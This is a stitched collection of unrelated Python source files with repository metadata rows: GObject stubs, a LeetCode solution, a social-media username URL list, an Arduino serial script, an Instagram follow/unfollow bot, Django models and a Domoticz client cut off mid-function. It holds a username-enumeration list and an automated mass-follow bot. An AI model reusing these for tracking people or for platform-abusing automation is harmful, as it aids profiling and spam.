""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def handler_is_connected(*args, **kwargs): # reliably restored by inspect
""" signal_handler_is_connected(instance:GObject.Object, handler_id:int) -> bool """
pass
def handler_unblock(*args, **kwargs): # reliably restored by inspect
""" signal_handler_unblock(instance:GObject.Object, handler_id:int) """
pass
def handler_unblock_by_func(self, *args, **kwargs): # real signature unknown
pass
def install_properties(self, pspecs): # real signature unknown; restored from __doc__
""" install_properties(self, pspecs:list) """
pass
def install_property(self, property_id, pspec): # real signature unknown; restored from __doc__
""" install_property(self, property_id:int, pspec:GObject.ParamSpec) """
pass
def interface_find_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_install_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_list_properties(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def is_floating(self): # real signature unknown; restored from __doc__
""" is_floating(self) -> bool """
return False
def list_properties(self): # real signature unknown; restored from __doc__
""" list_properties(self) -> list, n_properties:int """
return []
def new(self, schema_id, path): # real signature unknown; restored from __doc__
""" new(schema_id:str, path:str) -> Dazzle.SettingsSandwich """
pass
def newv(self, object_type, parameters): # real signature unknown; restored from __doc__
""" newv(object_type:GType, parameters:list) -> GObject.Object """
pass
def notify(self, property_name): # real signature unknown; restored from __doc__
""" notify(self, property_name:str) """
pass
def notify_by_pspec(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def override_property(self, property_id, name): # real signature unknown; restored from __doc__
""" override_property(self, property_id:int, name:str) """
pass
def ref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def ref_sink(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def run_dispose(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_boolean(self, key, val): # real signature unknown; restored from __doc__
""" set_boolean(self, key:str, val:bool) """
pass
def set_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_double(self, key, val): # real signature unknown; restored from __doc__
""" set_double(self, key:str, val:float) """
pass
def set_int(self, key, val): # real signature unknown; restored from __doc__
""" set_int(self, key:str, val:int) """
pass
def set_properties(self, *args, **kwargs): # real signature unknown
pass
def set_property(self, *args, **kwargs): # real signature unknown
pass
def set_string(self, key, val): # real signature unknown; restored from __doc__
""" set_string(self, key:str, val:str) """
pass
def set_uint(self, key, val): # real signature unknown; restored from __doc__
""" set_uint(self, key:str, val:int) """
pass
def set_value(self, key, value): # real signature unknown; restored from __doc__
""" set_value(self, key:str, value:GLib.Variant) """
pass
def steal_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def steal_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def stop_emission(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def stop_emission_by_name(*args, **kwargs): # reliably restored by inspect
""" signal_stop_emission_by_name(instance:GObject.Object, detailed_signal:str) """
pass
def thaw_notify(self): # real signature unknown; restored from __doc__
""" thaw_notify(self) """
pass
def unbind(self, property): # real signature unknown; restored from __doc__
""" unbind(self, property:str) """
pass
def unref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def watch_closure(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def weak_ref(self, *args, **kwargs): # real signature unknown
pass
def _force_floating(self, *args, **kwargs): # real signature unknown
""" force_floating(self) """
pass
def _ref(self, *args, **kwargs): # real signature unknown
""" ref(self) -> GObject.Object """
pass
def _ref_sink(self, *args, **kwargs): # real signature unknown
""" ref_sink(self) -> GObject.Object """
pass
def _unref(self, *args, **kwargs): # real signature unknown
""" unref(self) """
pass
def _unsupported_data_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def _unsupported_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __deepcopy__(self, *args, **kwargs): # real signature unknown
pass
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, **properties): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
g_type_instance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
qdata = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
ref_count = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__gpointer__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__grefcount__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
props = None # (!) real value is '<gi._gi.GProps object at 0x7f3b25efe460>'
__class__ = None # (!) real value is "<class 'gi.types.GObjectMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': ObjectInfo(SettingsSandwich), '__module__': 'gi.repository.Dazzle', '__gtype__': <GType DzlSettingsSandwich (93962411670528)>, '__doc__': None, '__gsignals__': {}, 'new': gi.FunctionInfo(new), 'append': gi.FunctionInfo(append), 'bind': gi.FunctionInfo(bind), 'bind_with_mapping': gi.FunctionInfo(bind_with_mapping), 'get_boolean': gi.FunctionInfo(get_boolean), 'get_default_value': gi.FunctionInfo(get_default_value), 'get_double': gi.FunctionInfo(get_double), 'get_int': gi.FunctionInfo(get_int), 'get_string': gi.FunctionInfo(get_string), 'get_uint': gi.FunctionInfo(get_uint), 'get_user_value': gi.FunctionInfo(get_user_value), 'get_value': gi.FunctionInfo(get_value), 'set_boolean': gi.FunctionInfo(set_boolean), 'set_double': gi.FunctionInfo(set_double), 'set_int': gi.FunctionInfo(set_int), 'set_string': gi.FunctionInfo(set_string), 'set_uint': gi.FunctionInfo(set_uint), 'set_value': gi.FunctionInfo(set_value), 'unbind': gi.FunctionInfo(unbind)})"
__gdoc__ = 'Object DzlSettingsSandwich\n\nProperties from DzlSettingsSandwich:\n path -> gchararray: Settings Path\n Settings Path\n schema-id -> gchararray: Schema Id\n Schema Id\n\nSignals from GObject:\n notify (GParam)\n\n'
__gsignals__ = {}
__gtype__ = None # (!) real value is '<GType DzlSettingsSandwich (93962411670528)>'
__info__ = ObjectInfo(SettingsSandwich)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
8dc31ef220e3a12803bb906e33892e6ea9a93a18 | b00873d36e44128ce30623da0ee3b556e4e3d7e7 | /solutions/solution725.py | 534be36c9402b8115b72bfe0c67a417dff55304b | [
"MIT"
] | permissive | Satily/leetcode_python_solution | b4aadfd1998877b5086b5423c670750bb422b2c8 | 3f05fff7758d650469862bc28df9e4aa7b1d3203 | refs/heads/master | 2021-07-18T07:53:10.387182 | 2021-07-17T06:30:09 | 2021-07-17T06:30:09 | 155,074,789 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from data_structure import ListNode, build_link_list, flatten_link_list
class Solution:
    def splitListToParts(self, root, k):
        """
        Split a linked list into k consecutive parts whose sizes differ by
        at most one; earlier parts receive the extra nodes, and missing
        parts are returned as None.

        :type root: ListNode
        :type k: int
        :rtype: List[ListNode]
        """
        def detach_prefix(head, length):
            # Cut `length` nodes off the front; return (remainder, prefix).
            if head is None:
                return None, None
            tail = head
            for _ in range(length - 1):
                tail = tail.next
            remainder = tail.next
            tail.next = None
            return remainder, head

        # First pass: count the nodes.
        total = 0
        node = root
        while node is not None:
            node = node.next
            total += 1

        base, extra = divmod(total, k)
        result = []
        for part in range(k):
            part_len = base + 1 if part < extra else base
            root, head = detach_prefix(root, part_len)
            result.append(head)
        return result
if __name__ == "__main__":
    # Ad-hoc smoke test: build a list, split it, print the flattened parts.
    test_cases = [
        # ([1, 2, 3], 5),
        ([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3),
    ]
    solver = Solution()
    for values, part_count in test_cases:
        head = build_link_list(values)
        parts = solver.splitListToParts(head, part_count)
        print([flatten_link_list(part) for part in parts])
| [
"houjiaxu@xiaomi.com"
] | houjiaxu@xiaomi.com |
c3fed80595739ad1d496d693798265472af3607a | 6439bf971c39fc99813b6330532c3dce15e9da4a | /__SocialMedia_Sites.py | af4c328cf9d4536b5aabd7a9a8bc93e5993f2be8 | [
"MIT"
] | permissive | elithaxxor/pi_repo | 830c07059d1b779270eeb467de381d9cef44eedb | 8e54e32dfcc06ce777d13010b3d1efb1fd9ef43a | refs/heads/main_pi | 2023-08-10T16:00:53.868384 | 2021-10-04T23:55:20 | 2021-10-04T23:55:20 | 412,363,849 | 0 | 0 | MIT | 2021-10-01T07:13:14 | 2021-10-01T07:03:25 | null | UTF-8 | Python | false | false | 5,432 | py | #import socialmedia
#from socialmedia import USERNAME
# Handle prompted once at import time; every profile URL below embeds it.
# (The f-prefix was dropped: the prompt contains no placeholders.)
USERNAME = input('[sys] Enter Username:')
# ---------------------------------------------------------------------------
# Profile-URL templates: one candidate URL per social network, each built
# from the USERNAME entered above.  All of them are collected into the
# WEBSITES list at the bottom for iterating during a username search.
# ---------------------------------------------------------------------------
# INSTAGRAM
instagram = f'https://www.instagram.com/{USERNAME}'
# FACEBOOK
facebook = f'https://www.facebook.com/{USERNAME}'
#TWITTER
twitter = f'https://www.twitter.com/{USERNAME}'
# YOUTUBE
youtube = f'https://www.youtube.com/{USERNAME}'
# BLOGGER
blogger = f'https://{USERNAME}.blogspot.com'
# GOOGLE+
google_plus = f'https://plus.google.com/s/{USERNAME}/top'
# REDDIT
reddit = f'https://www.reddit.com/user/{USERNAME}'
# WORDPRESS
wordpress = f'https://{USERNAME}.wordpress.com'
# PINTEREST
pinterest = f'https://www.pinterest.com/{USERNAME}'
# GITHUB
github = f'https://www.github.com/{USERNAME}'
# TUMBLR
tumblr = f'https://{USERNAME}.tumblr.com'
# FLICKR
flickr = f'https://www.flickr.com/people/{USERNAME}'
# STEAM
steam = f'https://steamcommunity.com/id/{USERNAME}'
# VIMEO
vimeo = f'https://vimeo.com/{USERNAME}'
# SOUNDCLOUD
soundcloud = f'https://soundcloud.com/{USERNAME}'
# DISQUS
disqus = f'https://disqus.com/by/{USERNAME}'
# MEDIUM
medium = f'https://medium.com/@{USERNAME}'
# DEVIANTART
deviantart = f'https://{USERNAME}.deviantart.com'
# VK
vk = f'https://vk.com/{USERNAME}'
# ABOUT.ME
aboutme = f'https://about.me/{USERNAME}'
# IMGUR
imgur = f'https://imgur.com/user/{USERNAME}'
# FLIPBOARD
flipboard = f'https://flipboard.com/@{USERNAME}'
# SLIDESHARE
slideshare = f'https://slideshare.net/{USERNAME}'
# FOTOLOG
fotolog = f'https://fotolog.com/{USERNAME}'
# SPOTIFY
spotify = f'https://open.spotify.com/user/{USERNAME}'
# MIXCLOUD
mixcloud = f'https://www.mixcloud.com/{USERNAME}'
# SCRIBD
scribd = f'https://www.scribd.com/{USERNAME}'
# BADOO
badoo = f'https://www.badoo.com/en/{USERNAME}'
# PATREON
patreon = f'https://www.patreon.com/{USERNAME}'
# BITBUCKET
bitbucket = f'https://bitbucket.org/{USERNAME}'
# DAILYMOTION
dailymotion = f'https://www.dailymotion.com/{USERNAME}'
# ETSY
etsy = f'https://www.etsy.com/shop/{USERNAME}'
# CASHME
cashme = f'https://cash.me/{USERNAME}'
# BEHANCE
behance = f'https://www.behance.net/{USERNAME}'
# GOODREADS
goodreads = f'https://www.goodreads.com/{USERNAME}'
# INSTRUCTABLES
instructables = f'https://www.instructables.com/member/{USERNAME}'
# KEYBASE
keybase = f'https://keybase.io/{USERNAME}'
# KONGREGATE
kongregate = f'https://kongregate.com/accounts/{USERNAME}'
# LIVEJOURNAL
livejournal = f'https://{USERNAME}.livejournal.com'
# ANGELLIST
angellist = f'https://angel.co/{USERNAME}'
# LAST.FM
last_fm = f'https://last.fm/user/{USERNAME}'
# DRIBBBLE
dribbble = f'https://dribbble.com/{USERNAME}'
# CODECADEMY
codecademy = f'https://www.codecademy.com/{USERNAME}'
# GRAVATAR
gravatar = f'https://en.gravatar.com/{USERNAME}'
# PASTEBIN
pastebin = f'https://pastebin.com/u/{USERNAME}'
# FOURSQUARE
foursquare = f'https://foursquare.com/{USERNAME}'
# ROBLOX
roblox = f'https://www.roblox.com/user.aspx?USERNAME={USERNAME}'
# GUMROAD
gumroad = f'https://www.gumroad.com/{USERNAME}'
# NEWSGROUND
newsground = f'https://{USERNAME}.newgrounds.com'
# WATTPAD
wattpad = f'https://www.wattpad.com/user/{USERNAME}'
# CANVA
canva = f'https://www.canva.com/{USERNAME}'
# CREATIVEMARKET
creative_market = f'https://creativemarket.com/{USERNAME}'
# TRAKT
trakt = f'https://www.trakt.tv/users/{USERNAME}'
# 500PX
five_hundred_px = f'https://500px.com/{USERNAME}'
# BUZZFEED
buzzfeed = f'https://buzzfeed.com/{USERNAME}'
# TRIPADVISOR
tripadvisor = f'https://tripadvisor.com/members/{USERNAME}'
# HUBPAGES
hubpages = f'https://{USERNAME}.hubpages.com'
# CONTENTLY
contently = f'https://{USERNAME}.contently.com'
# HOUZZ
houzz = f'https://houzz.com/user/{USERNAME}'
#BLIP.FM
blipfm = f'https://blip.fm/{USERNAME}'
# WIKIPEDIA
wikipedia = f'https://www.wikipedia.org/wiki/User:{USERNAME}'
# HACKERNEWS
hackernews = f'https://news.ycombinator.com/user?id={USERNAME}'
# CODEMENTOR
codementor = f'https://www.codementor.io/{USERNAME}'
# REVERBNATION
reverb_nation = f'https://www.reverbnation.com/{USERNAME}'
# DESIGNSPIRATION
designspiration = f'https://www.designspiration.net/{USERNAME}'
# BANDCAMP
bandcamp = f'https://www.bandcamp.com/{USERNAME}'
# COLOURLOVERS
colourlovers = f'https://www.colourlovers.com/love/{USERNAME}'
# IFTTT
ifttt = f'https://www.ifttt.com/p/{USERNAME}'
# EBAY
ebay = f'https://www.ebay.com/usr/{USERNAME}'
# SLACK
slack = f'https://{USERNAME}.slack.com'
# OKCUPID
okcupid = f'https://www.okcupid.com/profile/{USERNAME}'
# TRIP
trip = f'https://www.trip.skyscanner.com/user/{USERNAME}'
# ELLO
ello = f'https://ello.co/{USERNAME}'
# TRACKY
tracky = f'https://tracky.com/user/~{USERNAME}'
# BASECAMP
basecamp = f'https://{USERNAME}.basecamphq.com/login'
#
''' WEBSITE LIST - USE FOR SEARCHING OF USERNAME '''
# NOTE(review): `codementor` is defined above but missing from this list --
# confirm whether that omission is intentional.
WEBSITES = [
    instagram, facebook, twitter, youtube, blogger, google_plus, reddit,
    wordpress, pinterest, github, tumblr, flickr, steam, vimeo, soundcloud, disqus,
    medium, deviantart, vk, aboutme, imgur, flipboard, slideshare, fotolog, spotify,
    mixcloud, scribd, badoo, patreon, bitbucket, dailymotion, etsy, cashme, behance,
    goodreads, instructables, keybase, kongregate, livejournal, angellist, last_fm,
    dribbble, codecademy, gravatar, pastebin, foursquare, roblox, gumroad, newsground,
    wattpad, canva, creative_market, trakt, five_hundred_px, buzzfeed, tripadvisor, hubpages,
    contently, houzz, blipfm, wikipedia, hackernews, reverb_nation, designspiration,
    bandcamp, colourlovers, ifttt, ebay, slack, okcupid, trip, ello, tracky, basecamp]
#
| [
"noreply@github.com"
] | elithaxxor.noreply@github.com |
be997587cc38355d84971511c1c26382c31d8d72 | 9e4792da65829c0605d42e27a79f568f7ad8cc30 | /Transmit_Ardino.py | 1661509706b626696d582c01421950c4905af4f2 | [] | no_license | mihirkawatra/homeautomation | 88aa1b8e556128e0293dbb6369ea96b8750b3ca5 | 4c9cddca89b562a5d7c398cff4c1ecdc9ac2d3a8 | refs/heads/master | 2020-04-23T08:30:10.857158 | 2019-02-16T18:51:11 | 2019-02-16T18:51:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | import serial
# Module-level defaults (the redundant str("") wrappers were dropped).
# transmit() uses its own locals, so these mainly document the expected
# string shapes of the command keyword and the serial response.
k = ""
response = ""
def transmit(msg):
    """Send a command keyword to the Arduino over serial and print its reply.

    msg: one of "on"/"three" (both mapped to "on"), "off", "fan_on",
    "fan_off", "all_on" or "all_off".  Unknown values are now rejected
    up front instead of raising NameError as the old if/elif chain did.
    """
    # Mapping from accepted messages to the keyword actually written out.
    commands = {
        "on": "on", "three": "on",
        "off": "off",
        "fan_on": "fan_on", "fan_off": "fan_off",
        "all_on": "all_on", "all_off": "all_off",
    }
    command = commands.get(msg)
    if command is None:
        print("Unknown command: " + msg)
        return
    ser = serial.Serial('com4', 9600, parity=serial.PARITY_NONE,
                        stopbits=serial.STOPBITS_ONE,
                        bytesize=serial.EIGHTBITS, timeout=1)
    try:
        # Repeat the write a few times so the receiver reliably sees it.
        for _ in range(5):
            ser.write(command.encode())
        response = ser.readline().strip().decode("utf-8")
        print("Response: " + response)
    finally:
        # Bug fix: the original `ser.close` lacked parentheses and never
        # actually closed the port.
        ser.close()
transmit("all_off") | [
"mihirkawatra98@gmail.com"
] | mihirkawatra98@gmail.com |
a39449cefa7af5148914f91fc5647fafe9ca4355 | c8c790edfce8522ce196955c7da4494d34a0290c | /insta_auto.py | 9a34d320961126f5ec3638690e369f87da978041 | [
"MIT"
] | permissive | anounman/Insta-Follow-Boster-For-Indian-Users-With-Python | c36b2932c6bff593155b291464de67b71b165b76 | e476b48e3a3371178f1c9188de1833d0856a05b0 | refs/heads/master | 2023-04-06T23:38:03.512395 | 2021-04-03T05:55:09 | 2021-04-03T05:55:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 843 | py | from time import sleep
import datetime
import random
from instagram_private_api import Client, ClientCompatPatch
# Placeholder Instagram credentials -- replace with real values (better:
# load them from the environment instead of hard-coding them in source).
username = "username"
password = "password"
# Log in once at import time.
# NOTE(review): this broad except swallows every login failure; after the
# back-off sleep the module continues with `api` undefined, so the first
# follow()/unfollow() call will raise NameError.  Consider re-raising here.
try:
    api = Client(username, password)
except Exception as e :
    print(e)
    # back off for a few minutes (rate-limit friendly) before moving on
    sleep(random.randint(200, 300))
    pass
def follow():
    """Follow every account listed in ids.txt ('/'-separated ids)."""
    # `with` guarantees the handle is closed even if a request fails (the
    # original leaked it on error); `user_ids` avoids shadowing builtin `id`.
    with open('ids.txt', 'r') as id_file:
        user_ids = id_file.read().split('/')
    for user_id in user_ids:
        api.friendships_create(user_id)
        # random pause so the traffic looks less bot-like
        sleep(random.randint(6, 10))
def unfollow():
    """Unfollow every account listed in ids.txt ('/'-separated ids)."""
    # Same fixes as follow(): context-managed file, no builtin shadowing.
    with open('ids.txt', 'r') as id_file:
        user_ids = id_file.read().split('/')
    for user_id in user_ids:
        api.friendships_destroy(user_id)
        # random pause so the traffic looks less bot-like
        sleep(random.randint(6, 10))
def run():
    """Alternate follow/unfollow phases forever, two hours apart."""
    phases = (("Start Follow", follow), ("Start Unfollow", unfollow))
    while True:
        for banner, action in phases:
            print(banner)
            action()
            sleep(7200)
run()
| [
"noreply@github.com"
] | anounman.noreply@github.com |
c3784b117e770c6c6948e80849e5bd8cf0457254 | 7727187a009e4b9c46c2fe06609372ec8814cd23 | /test/test_augment_data.py | d83bec586121132d679dc61a95c78929cece6eea | [] | no_license | govtmirror/freemix-akara | ebf204554f4effc0543e60083698f2ea012413b8 | 1d10c3f02afbd4268852e2c52afdf77809176bdd | refs/heads/master | 2021-01-12T07:47:08.183429 | 2014-06-05T18:53:56 | 2014-06-05T18:53:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | import os
import urllib, urllib2
from urllib2 import urlopen
from freemix_akara import __version__
from server_support import server
# Directory holding the fixture payloads posted to the service.
RESOURCE_DIR = os.path.join(os.path.dirname(__file__), "resource")
def test_augment():
    """POST the augment fixture to the service and expect an 'items' key."""
    import simplejson
    payload = open(os.path.join(RESOURCE_DIR, "augment", "augment_test1.js")).read()
    endpoint = server() + "augment.freemix.json"
    request = urllib2.Request(endpoint)
    parsed = simplejson.load(urllib2.urlopen(request, payload))
    assert "items" in parsed
def test_mix():
    """POST the mix fixture to the service and expect an 'items' key."""
    import simplejson
    payload = open(os.path.join(RESOURCE_DIR, "mix", "mix.js")).read()
    endpoint = server() + "mix.freemix.json"
    request = urllib2.Request(endpoint)
    parsed = simplejson.load(urllib2.urlopen(request, payload))
    assert "items" in parsed
| [
"dfeeney@gmail.com"
] | dfeeney@gmail.com |
67d57a5427e0bd112d0c8b58a7e3fcc7a4b6cac6 | a76401f82ed1c9ac47ddaff27681b90f37627426 | /.history/student_olx/main/models_20210914210437.py | 4dc4e069e91d0907166c727d7146b7a75b293961 | [] | no_license | RiteshK555/itw-project | e90e1dd13517ee8b07d72cc3bd5a42af367ab587 | a2e4c8682c2030ff77da9ade5ae4677bd475f87a | refs/heads/master | 2023-08-30T03:48:58.904979 | 2021-11-10T09:50:59 | 2021-11-10T09:50:59 | 410,032,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | from django.db import models
# Create your models here.
class ToDoList(models.Model):
    """A named collection of to-do items."""
    # Display name of the list.
    name = models.CharField(max_length=100)

    def __str__(self):
        return self.name
class Item(models.Model):
    """A single entry belonging to a ToDoList."""
    # Owning list; items are deleted together with their list.
    todolist = models.ForeignKey(ToDoList, on_delete=models.CASCADE)
    text = models.CharField(max_length=100)
    complete = models.BooleanField()

    def __str__(self):
        # Bug fix: the original returned `self.texta`, which raised
        # AttributeError -- the field is named `text`.
        return self.text
| [
""
] | |
0bb1525310eb1413798c18b37fff07653451452a | 477c6821a11a8fbd0aa0f941be0bdece423d159d | /venv/bin/flask | 0f20895c4ca369ffb602363ea11844488cc35787 | [] | no_license | ruthviksai/WeatherApp | 0f9cf5b328f2cb6b01baea1740fe3b5a6f8c9e0e | 14ba6e1b356067bcfd3434af9191b23d9cf234ca | refs/heads/master | 2021-06-27T10:50:11.690968 | 2019-09-28T20:11:35 | 2019-09-28T20:11:35 | 211,556,027 | 0 | 0 | null | 2021-03-20T01:46:58 | 2019-09-28T20:10:39 | Python | UTF-8 | Python | false | false | 247 | #!/Users/ruthvik/Desktop/WeatherApp/venv/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"ruthvs@uw.edu"
] | ruthvs@uw.edu | |
59560666f370de54095a5d4639b4b0ef6157eb06 | 5b91fa8588c7b8b556c027e308321f59ac7cf5f3 | /src/parameters/lgb.py | 2fafc10c6faf6a1d658adff4fe78a57ebb66abd1 | [] | no_license | ykfujita/jpx1-3rd | 0cd8a25cfd1d85ff0a69af52e73d3f14d54d0785 | e632f4663f2422730c5b5279ecc971d7345bec59 | refs/heads/main | 2023-07-06T21:25:44.661074 | 2021-07-21T20:31:58 | 2021-07-21T20:31:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,479 | py | from src.eval.spearmanr import custum_eval, custum_eval_sklearn
model_params = {
'objective': 'regression',
'metric': 'spearmanr',
# 'learning_rate': 0.01,
}
# sklearn interfaceでfitされるときに渡すパラメタ
fit_params = {
'eval_metric': custum_eval_sklearn,
'early_stopping_rounds': 100
}
# optunaを通してlgb.trainに渡されるパラメタ
hpo_params = {
'feval': custum_eval
}
best_params1 = {
'objective': 'regression',
'metric': 'spearmanr',
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 0.16889530286745985,
'lambda_l2': 1.2410595580996777e-06,
'num_leaves': 31,
'feature_fraction': 0.5,
'bagging_fraction': 0.9000256584722999,
'bagging_freq': 5,
'min_child_samples': 5,
'num_iterations': 10000,
}
best_params2 = {
'objective': 'regression',
'metric': 'spearmanr',
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 8.062872033881925,
'lambda_l2': 0.026625655716661895,
'num_leaves': 92,
'feature_fraction': 0.5,
'bagging_fraction': 1.0,
'bagging_freq': 0,
'min_child_samples': 25,
'num_iterations': 10000,
}
best_params_dict = {
'label_high_20':
{
# 'boosting_type': 'gbdt',
# 'class_weight': None,
# 'colsample_bytree': 1.0,
# 'importance_type': 'split',
# 'learning_rate': 0.1,
# 'max_depth': -1,
# 'min_child_samples': 20,
# 'min_child_weight': 0.001,
# 'min_split_gain': 0.0,
# 'n_estimators': 100,
# 'n_jobs': -1,
'objective': 'regression',
'metric': 'spearmanr',
# 'random_state': None,
# 'reg_alpha': 0.0,
# 'reg_lambda': 0.0,
# 'silent': True,
# 'subsample': 1.0,
# 'subsample_for_bin': 200000,
# 'subsample_freq': 0,
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 0.0035375367055248907,
'lambda_l2': 0.24776283117729828,
'num_leaves': 253,
'feature_fraction': 0.5,
'bagging_fraction': 1.0,
'bagging_freq': 0,
'num_iterations': 10000,
# 'early_stopping_round': 100
},
'label_low_20':
{
# 'boosting_type': 'gbdt',
# 'class_weight': None,
# 'colsample_bytree': 1.0,
# 'importance_type': 'split',
# 'learning_rate': 0.1,
# 'max_depth': -1,
# 'min_child_samples': 20,
# 'min_child_weight': 0.001,
# 'min_split_gain': 0.0,
# 'n_estimators': 100,
# 'n_jobs': -1,
'objective': 'regression',
'metric': 'spearmanr',
# 'random_state': None,
# 'reg_alpha': 0.0,
# 'reg_lambda': 0.0,
# 'silent': True,
# 'subsample': 1.0,
# 'subsample_for_bin': 200000,
# 'subsample_freq': 0,
'feature_pre_filter': False,
'verbosity': -1,
'lambda_l1': 0.0005732579932630379,
'lambda_l2': 4.614903511074905e-06,
'num_leaves': 31,
'feature_fraction': 0.6,
'bagging_fraction': 1.0,
'bagging_freq': 0,
'num_iterations': 10000,
# 'early_stopping_round': 100
}
}
| [
"charmer.popopo@gmail.com"
] | charmer.popopo@gmail.com |
97acc03ad3a35a433738121b10ab65da2dade94f | 409924961d406d274eccd872db21c29c6cc36d38 | /pymoticz.py | 97b39c07f2f4ab0e2f478aa2dec250b50816e115 | [] | no_license | EirikAskheim/pymoticz | 580b1f6a1080b933a2096acaaefe0cbf7a570feb | 03401ba2e9b602aca03d808560cd2a277a4df363 | refs/heads/master | 2016-09-09T23:46:02.891189 | 2013-03-06T21:53:11 | 2013-03-06T21:53:11 | 8,611,079 | 2 | 6 | null | null | null | null | UTF-8 | Python | false | false | 3,019 | py | #!/usr/bin/env python
"""Usage:
pymoticz list [--host=<host>] [--names]
pymoticz test
pymoticz status <id> [--host=<host>]
pymoticz on <id> [--host=<host>]
pymoticz off <id> [--host=<host>]
pymoticz dim <id> <level> [--host=<host>]
"""
import requests
import json
# Public API of the module and its version string.
__all__ = [ 'Pymoticz' ]
__version__ = '0.1'
class Pymoticz:
    """Minimal client for the Domoticz JSON API (lights and dimmers)."""
    DIMMER = u'Dimmer'
    ON_OFF = u'On/Off'
    SWITCH_TYPES = [DIMMER, ON_OFF]

    def __init__(self, domoticz_host='127.0.0.1:8080'):
        self.host = domoticz_host

    def _request(self, url):
        """GET `url` and return the decoded JSON payload."""
        r = requests.get(url)
        if r.status_code == 200:
            return json.loads(r.text)
        # Bug fix: the original used a bare `raise` with no active
        # exception, which itself raises RuntimeError.  Surface the real
        # HTTP failure instead.
        r.raise_for_status()
        raise IOError('Unexpected status %d from %s' % (r.status_code, url))

    def list_names(self):
        """Return the names of all configured devices."""
        devices = self.list()
        return [device['Name'] for device in devices['result']]

    def list(self):
        """Return the raw device listing from Domoticz."""
        url = 'http://%s/json.htm?type=devices&used=true' % self.host
        return self._request(url)

    def turn_on(self, _id):
        """Switch device `_id` on."""
        url = 'http://%s/json.htm?type=command&param=switchlight&idx=%s&switchcmd=On' % (self.host, _id)
        return self._request(url)

    def turn_off(self, _id):
        """Switch device `_id` off."""
        url = 'http://%s/json.htm?type=command&param=switchlight&idx=%s&switchcmd=Off&level=0' % (self.host, _id)
        return self._request(url)

    def dim(self, _id, level):
        """Set dimmer `_id` to `level`; returns an error string on bad input."""
        device = self.get_device(_id)
        if device is None:
            return 'No device with that id.'
        max_dim = device['MaxDimLevel']
        if int(level) > max_dim or int(level) < 0:
            return 'Level has to be in the range 0 to %d' % max_dim
